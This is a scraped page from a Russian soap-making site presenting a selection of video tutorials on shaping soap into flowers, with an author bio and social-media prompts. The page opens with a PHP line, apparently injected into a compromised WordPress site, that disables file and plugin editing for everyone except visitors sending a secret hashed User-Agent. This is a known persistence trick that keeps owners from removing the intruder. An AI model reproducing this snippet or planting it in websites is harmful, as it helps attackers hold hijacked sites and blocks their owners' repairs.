if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 5 видеоуроков, как сделать мыло в форме цветов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

5 видеоуроков, как сделать мыло в форме цветов

Сегодня подготовила подборку видео как можно сделать цветы из мыла. На первый взгляд кажется, что мыло совершенно не эластичный материал, который сможет поддаться лепке, а значит сделать из него прекрасную цветочную композицию, не представляется возможным

Сего­дня под­го­то­ви­ла под­бор­ку видео как мож­но сде­лать цве­ты из мыла. На пер­вый взгляд кажет­ся, что мыло совер­шен­но не эла­стич­ный мате­ри­ал, кото­рый смо­жет под­дать­ся леп­ке, а зна­чит сде­лать из него пре­крас­ную цве­точ­ную ком­по­зи­цию, не пред­став­ля­ет­ся возможным.

Одна­ко, домаш­нее мыло­ва­ре­ние обла­да­ет сво­и­ми сек­ре­та­ми, кото­рые помо­гут создать желан­ный шедевр в виде кра­си­вых цве­тов. Подоб­ное мыло изго­тав­ли­ва­ет­ся клас­си­че­ски из мыль­ной осно­вы, эфир­ных масел, а для полу­че­ния мяг­ко­сти и пла­стич­но­сти добав­ля­ет­ся гли­це­рин или жела­тин. Оста­лось при­ме­нить свою фан­та­зию и ост­рый нож для фор­ми­ро­ва­ния цветов. 


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!